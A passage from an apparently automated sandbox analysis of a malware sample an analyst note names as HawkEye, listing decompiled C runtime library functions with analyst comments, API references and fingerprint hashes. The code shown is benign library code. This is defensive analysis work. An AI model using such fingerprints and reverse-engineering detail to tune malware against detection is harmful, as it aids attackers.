                                                  														 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t145 + 8)) + 1;  // ... result.lf_count++
                                                  														 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;  // ... result.char_count++
                                                  														goto L18;
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L22;
                                                  						L18:
                                                  					} while (_t143 < _v44);
                                                  				}
                                                  				L22:
                                                  				return L00AD1DCD(_v8 ^ _t146);  // __security_check_cookie
                                                  			}

                                                  Instruction addresses for E00AF99A8 above, one per C-code line in listing order (0x00000000 marks a line, such as a goto, that has no instruction of its own):
                                                  0x00af99b0 0x00af99b7 0x00af99ba 0x00af99c2 0x00af99c6 0x00af99d2 0x00af99d5 0x00af99d8
                                                  0x00af99df 0x00af99e7 0x00af99ea 0x00af99f0 0x00af99f3 0x00af99f8 0x00af99fa 0x00af99fd
                                                  0x00af9a00 0x00af9a05 0x00af9a0c 0x00af9a0f 0x00af9a13 0x00af9a1a 0x00af9a1d 0x00af9a24
                                                  0x00af9a2b 0x00af9a54 0x00af9a81 0x00af9a83 0x00000000 0x00af9a56 0x00af9a5c 0x00af9b30
                                                  0x00af9b3c 0x00af9b47 0x00af9b4c 0x00af9a62 0x00af9a69 0x00af9a6e 0x00af9a74 0x00af9a7d
                                                  0x00af9a7e 0x00000000 0x00af9a7e 0x00af9a74 0x00af9a5c 0x00af9a2d 0x00af9a31 0x00af9a34
                                                  0x00af9a3a 0x00af9a3c 0x00af9a3f 0x00af9a43 0x00af9a84 0x00af9a87 0x00af9a88 0x00af9a8d
                                                  0x00af9a93 0x00af9a99 0x00af9a9c 0x00af9a9e 0x00af9aa4 0x00af9ab5 0x00af9abb 0x00af9ac0
                                                  0x00af9add 0x00af9b51 0x00af9b57 0x00af9adf 0x00af9ae7 0x00af9af0 0x00af9af6 0x00000000
                                                  0x00af9af8 0x00af9afa 0x00af9afb 0x00af9b17 0x00000000 0x00af9b19 0x00af9b1d 0x00af9b1f
                                                  0x00af9b22 0x00000000 0x00af9b22 0x00af9b1d 0x00af9b17 0x00af9af6 0x00af9af0 0x00af9add
                                                  0x00af9ac0 0x00af9a93 0x00000000 0x00af9b25 0x00af9b25 0x00af9b2e 0x00af9b59 0x00af9b6b

                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00441F0F,00000000,00000000,?,?,?,?,?,?,?,00AFA134,?,00000000,00000000,?,D77501FB), ref: 00AF99EA
                                                  • __fassign.LIBCMT ref: 00AF9A69
                                                  • __fassign.LIBCMT ref: 00AF9A88
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00AF9AB5
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00AFA134), ref: 00AF9AD5
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00AFA134), ref: 00AF9B0F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 0dbfe4d1c04eda41686430d379c2729b5f37680586a91f4603e466412c324c47
                                                  • Instruction ID: 355f5f921e68cd7451e1990efff7a2886bc2ab54909ee84f8727cf5442c6f0a3
                                                  • Opcode Fuzzy Hash: 0dbfe4d1c04eda41686430d379c2729b5f37680586a91f4603e466412c324c47
                                                  • Instruction Fuzzy Hash: 09516DB1A10249AFDB10CFE8EC85AEEBBF9EF09310F14416AF655E7251D730A941CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			/* Second copy of the console text-mode write loop decompiled above as E00AF99A8: same control flow
                                                  			   and same ioinfo offsets (+0x18 handle, +0x2d flags, +0x2e parked lead byte), different image
                                                  			   (__pioinfo at 0x4130a0, cookie at 0x412014). E00405FC6 plays the part of E00AFF8A5 (ctype table)
                                                  			   and E00407222 that of E00AFB377 (mbtowc-style conversion). Library code in both copies. */
                                                  			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed char _v15;
                                                  				char _v16;
                                                  				void _v24;
                                                  				short _v28;
                                                  				char _v31;
                                                  				void _v32;
                                                  				long _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				signed int _v48;
                                                  				signed char* _v52;
                                                  				long _v56;
                                                  				int _v60;
                                                  				void* __ebx;
                                                  				signed int _t78;
                                                  				signed int _t80;
                                                  				int _t86;
                                                  				void* _t93;
                                                  				long _t96;
                                                  				void _t104;
                                                  				void* _t111;
                                                  				signed int _t115;
                                                  				signed int _t118;
                                                  				signed char _t123;
                                                  				signed char _t128;
                                                  				intOrPtr _t129;
                                                  				signed int _t131;
                                                  				signed char* _t133;
                                                  				intOrPtr* _t136;
                                                  				signed int _t138;
                                                  				void* _t139;
                                                  
                                                  				_t78 =  *0x412014; // 0x9e6834eb
                                                  				_v8 = _t78 ^ _t138;
                                                  				_t80 = _a8;
                                                  				_t118 = _t80 >> 6;
                                                  				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                  				_t133 = _a12;
                                                  				_v52 = _t133;
                                                  				_v48 = _t118;
                                                  				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                                  				_v40 = _a16 + _t133;
                                                  				_t86 = GetConsoleCP();
                                                  				_t136 = _a4;
                                                  				_v60 = _t86;
                                                  				 *_t136 = 0;
                                                  				 *((intOrPtr*)(_t136 + 4)) = 0;
                                                  				 *((intOrPtr*)(_t136 + 8)) = 0;
                                                  				while(_t133 < _v40) {
                                                  					_v28 = 0;
                                                  					_v31 =  *_t133;
                                                  					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                                  					_t123 =  *(_t129 + _t115 + 0x2d);
                                                  					if((_t123 & 0x00000004) == 0) {
                                                  						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {  // explicit _LEADBYTE (0x8000) test; E00AF99A8 expresses the same check as a sign test on the 16-bit entry
                                                  							_push(1);
                                                  							_push(_t133);
                                                  							goto L8;
                                                  						} else {
                                                  							if(_t133 >= _v40) {  // as decompiled this compares pch itself with the end pointer, which the while condition already rules out; E00AF99A8 shows the intended pch + 1 >= end test for a lead byte in last position
                                                  								_t131 = _v48;
                                                  								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                                  								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                  								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                  							} else {
                                                  								_t111 = E00407222( &_v28, _t133, 2);
                                                  								_t139 = _t139 + 0xc;
                                                  								if(_t111 != 0xffffffff) {
                                                  									_t133 =  &(_t133[1]);
                                                  									goto L9;
                                                  								}
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t128 = _t123 & 0x000000fb;
                                                  						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                                  						_push(2);
                                                  						_v15 = _t128;
                                                  						 *(_t129 + _t115 + 0x2d) = _t128;
                                                  						_push( &_v16);
                                                  						L8:
                                                  						_push( &_v28);
                                                  						_t93 = E00407222();
                                                  						_t139 = _t139 + 0xc;
                                                  						if(_t93 != 0xffffffff) {
                                                  							L9:
                                                  							_t133 =  &(_t133[1]);
                                                  							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                  							_v56 = _t96;
                                                  							if(_t96 != 0) {
                                                  								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                                  									L19:
                                                  									 *_t136 = GetLastError();
                                                  								} else {
                                                  									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                                  									if(_v36 >= _v56) {
                                                  										if(_v31 != 0xa) {
                                                  											goto L16;
                                                  										} else {
                                                  											_t104 = 0xd;
                                                  											_v32 = _t104;
                                                  											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                  												goto L19;
                                                  											} else {
                                                  												if(_v36 >= 1) {
                                                  													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                                  													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                  													goto L16;
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L20;
                                                  					L16:
                                                  				}
                                                  				L20:
                                                  				E004018CC();
                                                  				return _t136;
                                                  			}

                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                                                  • __fassign.LIBCMT ref: 004082E3
                                                  • __fassign.LIBCMT ref: 004082FE
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                                                  • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                                                  • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                                                  • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                                                  • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                                                  • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00AFC713(void* __ebx, void* __ecx, void* __edx) {
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t2;
                                                  				long _t3;
                                                  				intOrPtr _t5;
                                                  				long _t6;
                                                  				intOrPtr _t9;
                                                  				long _t10;
                                                  				long _t12;
                                                  				void* _t38;
                                                  				void* _t41;
                                                  				void* _t43;
                                                  				void* _t47;
                                                  				long _t48;
                                                  				long _t49;
                                                  				long _t53;
                                                  				long _t54;
                                                  				void* _t58;
                                                  
                                                  				_t47 = __edx;
                                                  				_t41 = __ecx;
                                                  				_t38 = __ebx;
                                                  				_push(_t48);
                                                  				_t53 = GetLastError();
                                                  				_t2 =  *0xb26230; // 0x6
                                                  				_t60 = _t2 - 0xffffffff;
                                                  				if(_t2 == 0xffffffff) {
                                                  					L5:
                                                  					_t3 = L00AF8E21(_t41, _t53, __eflags, _t2, 0xffffffff);
                                                  					__eflags = _t3;
                                                  					if(_t3 == 0) {
                                                  						goto L14;
                                                  					} else {
                                                  						_t48 = E00AF4F03(_t41, 1, 0x364);
                                                  						_pop(_t41);
                                                  						__eflags = _t48;
                                                  						if(__eflags != 0) {
                                                  							__eflags = L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t48);
                                                  							if(__eflags != 0) {
                                                  								E00AFC3B1(_t53, _t48, 0xb27ce0);
                                                  								L00AF4D62(0);
                                                  								_t58 = _t58 + 0xc;
                                                  								goto L12;
                                                  							} else {
                                                  								L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t30);
                                                  								_push(_t48);
                                                  								goto L8;
                                                  							}
                                                  						} else {
                                                  							L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t29);
                                                  							_push(_t48);
                                                  							L8:
                                                  							L00AF4D62();
                                                  							_pop(_t41);
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t48 = L00AF8DCB(_t41, _t53, _t60, _t2);
                                                  					if(_t48 == 0) {
                                                  						_t2 =  *0xb26230; // 0x6
                                                  						goto L5;
                                                  					} else {
                                                  						if(_t48 != 0xffffffff) {
                                                  							L12:
                                                  							__eflags = _t48;
                                                  							if(_t48 == 0) {
                                                  								goto L14;
                                                  							} else {
                                                  								SetLastError(_t53);
                                                  								return _t48;
                                                  							}
                                                  						} else {
                                                  							L14:
                                                  							SetLastError(_t53);
                                                  							L00AF4EBF(_t38, _t41, _t47, _t48, _t53);
                                                  							asm("int3");
                                                  							_t5 =  *0xb26230; // 0x6
                                                  							_push(_t53);
                                                  							_t63 = _t5 - 0xffffffff;
                                                  							if(_t5 == 0xffffffff) {
                                                  								L20:
                                                  								_t6 = L00AF8E21(_t41, _t53, __eflags, _t5, 0xffffffff);
                                                  								__eflags = _t6;
                                                  								if(_t6 == 0) {
                                                  									goto L29;
                                                  								} else {
                                                  									_t53 = E00AF4F03(_t41, 1, 0x364);
                                                  									_pop(_t41);
                                                  									__eflags = _t53;
                                                  									if(__eflags != 0) {
                                                  										__eflags = L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t53);
                                                  										if(__eflags != 0) {
                                                  											E00AFC3B1(_t53, _t53, 0xb27ce0);
                                                  											L00AF4D62(0);
                                                  											_t58 = _t58 + 0xc;
                                                  											goto L27;
                                                  										} else {
                                                  											L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t21);
                                                  											_push(_t53);
                                                  											goto L23;
                                                  										}
                                                  									} else {
                                                  										L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t20);
                                                  										_push(_t53);
                                                  										L23:
                                                  										L00AF4D62();
                                                  										_pop(_t41);
                                                  										goto L29;
                                                  									}
                                                  								}
                                                  							} else {
                                                  								_t53 = L00AF8DCB(_t41, _t53, _t63, _t5);
                                                  								if(_t53 == 0) {
                                                  									_t5 =  *0xb26230; // 0x6
                                                  									goto L20;
                                                  								} else {
                                                  									if(_t53 != 0xffffffff) {
                                                  										L27:
                                                  										__eflags = _t53;
                                                  										if(_t53 == 0) {
                                                  											goto L29;
                                                  										} else {
                                                  											return _t53;
                                                  										}
                                                  									} else {
                                                  										L29:
                                                  										L00AF4EBF(_t38, _t41, _t47, _t48, _t53);
                                                  										asm("int3");
                                                  										_push(_t38);
                                                  										_push(_t53);
                                                  										_push(_t48);
                                                  										_t54 = GetLastError();
                                                  										_t9 =  *0xb26230; // 0x6
                                                  										_t66 = _t9 - 0xffffffff;
                                                  										if(_t9 == 0xffffffff) {
                                                  											L36:
                                                  											_t10 = L00AF8E21(_t41, _t54, __eflags, _t9, 0xffffffff);
                                                  											__eflags = _t10;
                                                  											if(_t10 == 0) {
                                                  												goto L33;
                                                  											} else {
                                                  												_t12 = E00AF4F03(_t41, 1, 0x364);
                                                  												_pop(_t43);
                                                  												_t49 = _t12;
                                                  												__eflags = _t49;
                                                  												if(__eflags != 0) {
                                                  													__eflags = L00AF8E21(_t43, _t54, __eflags,  *0xb26230, _t49);
                                                  													if(__eflags != 0) {
                                                  														E00AFC3B1(_t54, _t49, 0xb27ce0);
                                                  														L00AF4D62(0);
                                                  														goto L43;
                                                  													} else {
                                                  														L00AF8E21(_t43, _t54, __eflags,  *0xb26230, 0);
                                                  														_push(_t49);
                                                  														goto L39;
                                                  													}
                                                  												} else {
                                                  													L00AF8E21(_t43, _t54, __eflags,  *0xb26230, 0);
                                                  													_push(0);
                                                  													L39:
                                                  													L00AF4D62();
                                                  													goto L33;
                                                  												}
                                                  											}
                                                  										} else {
                                                  											_t49 = L00AF8DCB(_t41, _t54, _t66, _t9);
                                                  											if(_t49 == 0) {
                                                  												_t9 =  *0xb26230; // 0x6
                                                  												goto L36;
                                                  											} else {
                                                  												if(_t49 != 0xffffffff) {
                                                  													L43:
                                                  													__eflags = _t49;
                                                  													if(_t49 == 0) {
                                                  														goto L33;
                                                  													} else {
                                                  														SetLastError(_t54);
                                                  													}
                                                  												} else {
                                                  													L33:
                                                  													SetLastError(_t54);
                                                  													_t49 = 0;
                                                  												}
                                                  											}
                                                  										}
                                                  										return _t49;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}
                                                  0x00afc7e1
                                                  0x00afc7dc
                                                  0x00afc7d0
                                                  0x00afc738
                                                  0x00afc733

                                                  APIs
                                                  • GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                  • _free.LIBCMT ref: 00AFC76E
                                                  • _free.LIBCMT ref: 00AFC7A2
                                                  • SetLastError.KERNEL32(00000000), ref: 00AFC7AF
                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • _free.LIBCMT ref: 00AFC817
                                                  • _free.LIBCMT ref: 00AFC84B
                                                    • Part of subcall function 00AF8E21: TlsSetValue.KERNEL32(?,?), ref: 00AF8E63
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ErrorLast$Value
                                                  • String ID:
                                                  • API String ID: 4121906797-0
                                                  • Opcode ID: d9f4ef22613161e81cf931f34309d6128c6b696bc44082e0c84cd1df7d5d86d9
                                                  • Instruction ID: f1998935303cc110cd1a8de605608f325aa020c7964d6a1431fbeae778fc4a7d
                                                  • Opcode Fuzzy Hash: d9f4ef22613161e81cf931f34309d6128c6b696bc44082e0c84cd1df7d5d86d9
                                                  • Instruction Fuzzy Hash: 7131E432D1451CA7DA2133FAAF46E7F6259AF45B70B200614FB25E71E6DF24CC1246A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                   			// Analyst note: CRT library code statically linked into the sample, not HawkEye's own
                                                   			// logic. Converts the narrow string _a4 into a freshly heap-allocated wide string stored
                                                   			// in *_a8 and returns 1 on success, 0 on failure. The shape is consistent with the UCRT's
                                                   			// narrow-to-wide path conversion: L00AF8C07 reads as AreFileApisANSI() (the sbb/+1
                                                   			// sequence leaves CP_ACP = 0 or CP_OEMCP = 1 in _t27), L00AF4D9C/L00AF4D62 as malloc/free
                                                   			// (the report lists HeapFree under subcall L00AF4D62 further down), E00AF69E3/E00AF68BC
                                                   			// as the errno = EINVAL (0x16) + _invalid_parameter_noinfo argument validation, and
                                                   			// E00AF69AD as the GetLastError()-to-errno mapping. _t10 + _t10 is length * sizeof(wchar_t).
                                                   			E00AFA4BB(char* _a4, short** _a8) {
                                                  				int _v8;
                                                  				void* __ecx;
                                                  				void* __esi;
                                                  				int _t10;
                                                  				int _t14;
                                                  				short* _t16;
                                                  				void* _t26;
                                                  				int _t27;
                                                  				void* _t29;
                                                  				int _t35;
                                                  				intOrPtr* _t39;
                                                  				short* _t40;
                                                  
                                                  				_push(_t29);
                                                  				if(_a4 != 0) {
                                                  					_t39 = _a8;
                                                  					if(_t39 != 0) {
                                                  						_push(_t26);
                                                  						L00AF8C07(_t29, _t39);
                                                  						asm("sbb ebx, ebx");
                                                  						_t35 = 0;
                                                  						_t27 = _t26 + 1;
                                                  						 *_t39 = 0;
                                                  						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                                                  						_v8 = _t10;
                                                  						if(_t10 != 0) {
                                                  							_t40 = L00AF4D9C(_t29, _t10 + _t10);
                                                  							if(_t40 != 0) {
                                                  								if(MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8) != 0) {
                                                  									_t16 = _t40;
                                                  									_t40 = 0;
                                                  									_t35 = 1;
                                                  									 *_a8 = _t16;
                                                  								} else {
                                                  									E00AF69AD(GetLastError());
                                                  								}
                                                  							}
                                                  							L00AF4D62(_t40);
                                                  							_t14 = _t35;
                                                  						} else {
                                                  							E00AF69AD(GetLastError());
                                                  							_t14 = 0;
                                                  						}
                                                  					} else {
                                                  						 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  						E00AF68BC();
                                                  						_t14 = 0;
                                                  					}
                                                  					return _t14;
                                                  				}
                                                  				 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  				E00AF68BC();
                                                  				return 0;
                                                   			}

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5aebb83cedcd2edf8f96c7049b27b49cb67ac8895fbb573d9b34d681b83c4bc5
                                                  • Instruction ID: a5458848da82f65e5e5dc7967c1cda0eadf3d2f618861e8d5d4fcaed30672cbc
                                                  • Opcode Fuzzy Hash: 5aebb83cedcd2edf8f96c7049b27b49cb67ac8895fbb573d9b34d681b83c4bc5
                                                  • Instruction Fuzzy Hash: 6611E4B290421CBBDB202FF1CD49DBB7AA8EF957B0B104218BA19E7250DA70C800C6B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                   			// Analyst note: CRT library code statically linked into the sample, not HawkEye's own
                                                   			// logic. Walks the module-id list _a4.._a8 and returns the first module that loads.
                                                   			// 0xb27bf8 is a per-id HMODULE cache (0 = not tried yet, -1 = known unavailable; the
                                                   			// "_t18 | 0xffffffff" store is the decompiler's rendering of -1) and 0xb1d670 the matching
                                                   			// module-name table. The first LoadLibraryExW uses 0x800 = LOAD_LIBRARY_SEARCH_SYSTEM32;
                                                   			// only if that fails with 0x57 (ERROR_INVALID_PARAMETER, i.e. an OS that does not know the
                                                   			// flag) and the name is not an "api-ms-"/"ext-ms-" API set does it retry with flags 0, the
                                                   			// default, hijackable search order (E00B04A91 reads as wcsncmp). The xchg/FreeLibrary pair
                                                   			// after the cache store drops the extra reference if another thread filled the slot first.
                                                   			// This matches the UCRT's try_get_module()/try_load_library_from_system_directory().
                                                   			E00AF8885(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                  				signed int* _v8;
                                                  				void** _t12;
                                                  				void* _t16;
                                                  				void* _t18;
                                                  				signed int _t22;
                                                  				WCHAR* _t23;
                                                  				void** _t26;
                                                  				signed int* _t29;
                                                  				void* _t32;
                                                  				void* _t34;
                                                  
                                                  				_t29 = _a4;
                                                  				while(_t29 != _a8) {
                                                  					_t22 =  *_t29;
                                                  					_t12 = 0xb27bf8 + _t22 * 4;
                                                  					_t32 =  *_t12;
                                                  					_v8 = _t12;
                                                  					if(_t32 == 0) {
                                                  						_t23 =  *(0xb1d670 + _t22 * 4);
                                                  						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                  						if(_t32 != 0) {
                                                  							L12:
                                                  							_t26 = _v8;
                                                  							 *_t26 = _t32;
                                                  							if( *_t26 != 0) {
                                                  								FreeLibrary(_t32);
                                                  							}
                                                  							L14:
                                                  							if(_t32 != 0) {
                                                  								_t16 = _t32;
                                                  								L18:
                                                  								return _t16;
                                                  							}
                                                  							L15:
                                                  							_t29 =  &(_t29[1]);
                                                  							continue;
                                                  						}
                                                  						_t18 = GetLastError();
                                                  						if(_t18 != 0x57) {
                                                  							L9:
                                                  							_t32 = 0;
                                                  							L10:
                                                  							if(_t32 != 0) {
                                                  								goto L12;
                                                  							}
                                                  							 *_v8 = _t18 | 0xffffffff;
                                                  							goto L15;
                                                  						}
                                                  						_t18 = E00B04A91(_t23, L"api-ms-", 7);
                                                  						_t34 = _t34 + 0xc;
                                                  						if(_t18 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t18 = E00B04A91(_t23, L"ext-ms-", 7);
                                                  						_t34 = _t34 + 0xc;
                                                  						if(_t18 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                  						_t32 = _t18;
                                                  						goto L10;
                                                  					}
                                                  					if(_t32 == 0xffffffff) {
                                                  						goto L15;
                                                  					}
                                                  					goto L14;
                                                  				}
                                                  				_t16 = 0;
                                                  				goto L18;
                                                   			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: d466ff4710c399b25b46713ee87954fc705d84eeb67ee66ae6125daa54761e99
                                                  • Instruction ID: 81e49570ab2a26cc163994491592b01dd4587dd65202193ce41e5aefc5eb23c0
                                                  • Opcode Fuzzy Hash: d466ff4710c399b25b46713ee87954fc705d84eeb67ee66ae6125daa54761e99
                                                  • Instruction Fuzzy Hash: 15210532A4522DBBDB318BB48C85A7A37A8AF017A0F550150FE05A7290DFB8DD01C6E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                   			// Analyst note: CRT library code statically linked into the sample, not HawkEye's own
                                                   			// logic. Frees the strings of a locale's time-format block: arrays of 7 (weekday names),
                                                   			// 7 (abbreviated weekday names), 12 (month names), 12 (abbreviated month names) and
                                                   			// 2 (AM/PM) strings, then three date/time format strings, once narrow and once wide (the
                                                   			// wide part ends with a fourth string, the locale name). E00B045C4 frees an array of n
                                                   			// strings; L00AF4D62 is free (the API list below shows HeapFree). This matches the UCRT's
                                                   			// __free_lc_time over its lc_time structure. The "return _t18" on the null-argument path
                                                   			// is a decompiler artifact of a void function; _t45 was left undeclared by the decompiler.
                                                   			E00B048DE(intOrPtr _a4) {
                                                   				intOrPtr _t45;
                                                   				void* _t18;
                                                  
                                                  				_t45 = _a4;
                                                  				if(_a4 != 0) {
                                                  					E00B045C4(_t45, 7);
                                                  					E00B045C4(_t45 + 0x1c, 7);
                                                  					E00B045C4(_t45 + 0x38, 0xc);
                                                  					E00B045C4(_t45 + 0x68, 0xc);
                                                  					E00B045C4(_t45 + 0x98, 2);
                                                  					L00AF4D62( *((intOrPtr*)(_t45 + 0xa0)));
                                                  					L00AF4D62( *((intOrPtr*)(_t45 + 0xa4)));
                                                  					L00AF4D62( *((intOrPtr*)(_t45 + 0xa8)));
                                                  					E00B045C4(_t45 + 0xb4, 7);
                                                  					E00B045C4(_t45 + 0xd0, 7);
                                                  					E00B045C4(_t45 + 0xec, 0xc);
                                                  					E00B045C4(_t45 + 0x11c, 0xc);
                                                  					E00B045C4(_t45 + 0x14c, 2);
                                                  					L00AF4D62( *((intOrPtr*)(_t45 + 0x154)));
                                                  					L00AF4D62( *((intOrPtr*)(_t45 + 0x158)));
                                                  					L00AF4D62( *((intOrPtr*)(_t45 + 0x15c)));
                                                  					return L00AF4D62( *((intOrPtr*)(_t45 + 0x160)));
                                                  				}
                                                  				return _t18;
                                                   			}

                                                  APIs
                                                    • Part of subcall function 00B045C4: _free.LIBCMT ref: 00B045E9
                                                  • _free.LIBCMT ref: 00B0492C
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00B04937
                                                  • _free.LIBCMT ref: 00B04942
                                                  • _free.LIBCMT ref: 00B04996
                                                  • _free.LIBCMT ref: 00B049A1
                                                  • _free.LIBCMT ref: 00B049AC
                                                  • _free.LIBCMT ref: 00B049B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
